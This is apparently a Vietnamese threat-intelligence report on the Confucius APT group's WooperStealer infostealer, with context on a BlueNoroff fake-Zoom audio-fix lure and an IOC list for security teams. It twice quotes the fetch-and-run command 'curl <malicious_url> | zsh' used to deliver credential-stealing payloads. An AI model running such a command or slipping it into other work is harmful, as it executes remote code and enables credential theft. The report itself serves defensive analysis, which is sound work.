Phân Tích Chiến Dịch APT: Nhóm Confucius Nhắm Mục Tiêu Các Tổ Chức Chính Phủ và Quân Sự
Tổ chức tin tặc Confucius Hackers, được công bố lần đầu vào năm 2016, tiếp tục là một mối đe dọa đáng kể đối với các tổ chức chính phủ và quân sự thông qua các chiến dịch tấn công mạng tinh vi. Sự dai dẳng và khả năng thích nghi của nhóm này cho thấy họ là một tác nhân đe dọa kiên trì, tập trung vào hoạt động gián điệp mạng để thu thập thông tin nhạy cảm từ các mục tiêu có giá trị cao.
Các Dòng Mã Độc Chính
Trong các chiến dịch gần đây nhất nhằm vào các mục tiêu chính phủ và quân sự, WooperStealer đã được xác định là mã độc chính mà nhóm Confucius Hackers sử dụng. WooperStealer là một loại infostealer (mã độc đánh cắp thông tin), được thiết kế để bí mật thu thập và đánh cắp dữ liệu nhạy cảm từ các hệ thống bị xâm nhập. Khả năng của nó trong việc trích xuất thông tin là yếu tố then chốt giúp nhóm tấn công đạt được mục tiêu gián điệp của mình.
Chi Tiết Về Tác Nhân Đe Dọa: Confucius Hackers
Confucius Hackers là một nhóm tin tặc khét tiếng đã hoạt động tích cực ít nhất từ năm 2016. Trọng tâm chính của nhóm này là gián điệp mạng, nhắm mục tiêu cụ thể vào các lĩnh vực chính phủ và quân sự. Các hoạt động của họ thường liên quan đến việc thu thập thông tin tình báo chiến lược và dữ liệu nhạy cảm, cho thấy một động cơ rõ ràng hướng tới việc phục vụ lợi ích của một quốc gia hoặc tổ chức cụ thể. Mặc dù có thông tin về sự tồn tại và mục tiêu của nhóm, chưa có thông tin nào được công bố liên kết trực tiếp nhóm này với các mã định danh CVE (Common Vulnerabilities and Exposures) hoặc các kỹ thuật theo khung MITRE ATT&CK cụ thể trong bối cảnh chiến dịch này.
Các Kỹ Thuật, Thủ Thuật và Quy Trình (TTPs)
Các chiến dịch của Confucius Hackers được đặc trưng bởi việc sử dụng các chiến thuật social engineering (kỹ thuật xã hội) cực kỳ tinh vi, được thiết kế riêng cho các mục tiêu giá trị cao. Các kỹ thuật này thường bao gồm:
- Chiến dịch lừa đảo tinh vi: Nhóm tấn công tạo ra các kịch bản lừa đảo đáng tin cậy, thường mạo danh các cá nhân hoặc tổ chức hợp pháp để tạo dựng niềm tin với nạn nhân. Điều này cho phép họ vượt qua các biện pháp bảo mật ban đầu bằng cách khai thác yếu tố con người.
- Sử dụng infostealer (WooperStealer): Sau khi thuyết phục được nạn nhân, mã độc đánh cắp thông tin WooperStealer được triển khai. Mã độc này có khả năng trích xuất một loạt dữ liệu nhạy cảm, bao gồm thông tin đăng nhập của người dùng (tên người dùng và mật khẩu) và hồ sơ trình duyệt. Việc đánh cắp thông tin đăng nhập là cực kỳ nguy hiểm, vì nó có thể dẫn đến việc xâm nhập sâu hơn vào mạng lưới hoặc các hệ thống khác của tổ chức.
- Tập trung vào dữ liệu nhạy cảm: Mục tiêu cuối cùng của việc triển khai infostealer là trích xuất dữ liệu nhạy cảm. Điều này không chỉ giới hạn ở thông tin đăng nhập mà còn có thể bao gồm tài liệu nội bộ, thông tin liên lạc và các dữ liệu khác có giá trị tình báo hoặc chiến lược.
Nền Tảng và Hạ Tầng Bị Khai Thác
Các chiến dịch của nhóm Confucius Hackers chủ yếu dựa vào social engineering trong các cuộc họp hoặc tương tác có vẻ hợp pháp. Điều này cho thấy nhóm không nhất thiết phải khai thác các lỗ hổng kỹ thuật phức tạp trên nền tảng phần mềm cụ thể mà thay vào đó, tập trung vào việc thao túng con người để đạt được mục tiêu. Không có thông tin trực tiếp nào về việc nhóm này sử dụng các nền tảng như Hacklink hoặc các chiến thuật SEO poisoning (đầu độc SEO) trong các chiến dịch được đề cập.
Liên Quan và Ngữ Cảnh Bổ Sung: Chiến Dịch BlueNoroff Sử Dụng Khai Thác Zoom
Mặc dù không trực tiếp liên quan đến nhóm Confucius Hackers, việc phân tích các chiến dịch tấn công mạng tương tự giúp cung cấp ngữ cảnh rộng hơn về bối cảnh mối đe dọa hiện tại. Một ví dụ điển hình là nhóm con BlueNoroff, một nhóm được chính phủ Triều Tiên bảo trợ, đã sử dụng một chiến thuật lừa đảo tinh vi liên quan đến Zoom.
Chi Tiết Chiến Dịch BlueNoroff
Trong chiến dịch này, nhóm BlueNoroff đã sử dụng một tên miền giả mạo là zoom-tech[.]us, được đăng ký vào ngày 14 tháng 4 năm 2025 (lưu ý: ngày đăng ký trong tương lai có thể là lỗi đánh máy hoặc một dấu hiệu nghi ngờ nhằm mục đích lừa đảo). Chiến thuật social engineering của họ liên quan đến việc giả mạo các liên hệ đáng tin cậy và dụ dỗ nạn nhân tham gia các cuộc họp Zoom.
Trong các cuộc họp này, nạn nhân bị thuyết phục chạy các script độc hại được ngụy trang thành công cụ sửa lỗi âm thanh. Những script này được thiết kế để trông có vẻ vô hại nhưng chứa các lệnh ẩn, thường được giấu giữa hàng ngàn dòng trống để tránh bị phát hiện. Việc này làm cho việc phân tích thủ công trở nên cực kỳ khó khăn và tốn thời gian, cho phép mã độc được thực thi mà không gây nghi ngờ ngay lập tức.
Chuỗi Triển Khai Mã Độc
Sau khi script độc hại được thực thi, nó sẽ tải về các payload phụ. Một ví dụ về lệnh thực thi payload được quan sát là:
curl <malicious_url> | zshLệnh này sử dụng curl để tải nội dung từ một URL độc hại và sau đó chuyển trực tiếp nội dung đó (mà không lưu vào đĩa) tới zsh (Z Shell) để thực thi. Điều này cho phép mã độc được chạy ngay lập tức mà không để lại dấu vết file trên hệ thống của nạn nhân, gây khó khăn cho việc điều tra và thu thập bằng chứng.
Các payload phụ này thường bao gồm các công cụ thu thập thông tin đăng nhập (credential harvesters) có khả năng trích xuất mật khẩu tài khoản cục bộ của người dùng. Việc đánh cắp các thông tin đăng nhập này có thể mở ra cánh cửa cho kẻ tấn công truy cập vào các hệ thống khác hoặc di chuyển ngang trong mạng lưới của tổ chức.
Chỉ Số Thỏa Hiệp (IOCs)
Việc nhận diện và theo dõi các Chỉ Số Thỏa Hiệp (IOCs) là rất quan trọng để các tổ chức bảo mật có thể phát hiện và ngăn chặn các cuộc tấn công. Đối với chiến dịch BlueNoroff, một IOC quan trọng đã được xác định:
- Tên miền giả mạo:
zoom-tech[.]us(được đăng ký ngày 14 tháng 4 năm 2025).
Lưu ý: Không có IOCs cụ thể nào được cung cấp trực tiếp cho các chiến dịch của nhóm Confucius Hackers trong thông tin đã cho.
Tóm Tắt để Tích Hợp SOC/TIP
Thông tin chi tiết về các chiến dịch tấn công này rất quan trọng để tích hợp vào các quy trình của Trung tâm Vận hành An ninh (SOC) hoặc các nền tảng Thông tin Tình báo về Mối đe dọa (TIP). Việc hiểu rõ về các tác nhân, mã độc và TTPs của chúng cho phép các nhóm bảo mật cải thiện khả năng phát hiện và phản ứng của mình.
Dành cho Confucius Hackers
- Tác nhân Đe dọa: Confucius Hackers
- Các Lĩnh vực Mục tiêu: Các tổ chức chính phủ, các tổ chức quân sự
- Dòng Mã Độc: WooperStealer
- Vector Tấn Công: Social Engineering (Kỹ thuật xã hội)
- Điểm Nổi bật về TTP: Đánh cắp thông tin đăng nhập thông qua infostealer; sử dụng các chiến thuật xã hội lừa đảo.
Dành cho BlueNoroff (Ngữ Cảnh Liên Quan)
- Tên miền giả mạo:
zoom-tech[.]us(đăng ký 14 tháng 4 năm 2025) - Vector Tấn Công: Social engineering trong các cuộc họp Zoom, sử dụng script công cụ sửa lỗi âm thanh giả mạo với các lệnh ẩn (~10.000 dòng trống).
- Lệnh Thực thi Payload:
curl <malicious_url> | zsh - Loại Mã Độc: Infostealer thu thập thông tin đăng nhập, bao gồm mật khẩu tài khoản cục bộ.
Đáng chú ý là không có thông tin về CVEs hoặc mã định danh MITRE ATT&CK nào được đề cập một cách rõ ràng trong bài viết nguồn liên quan đến các chiến dịch này. Tương tự, không có chiến thuật SEO poisoning nào được mô tả liên quan đến nhóm Confucius Hackers.
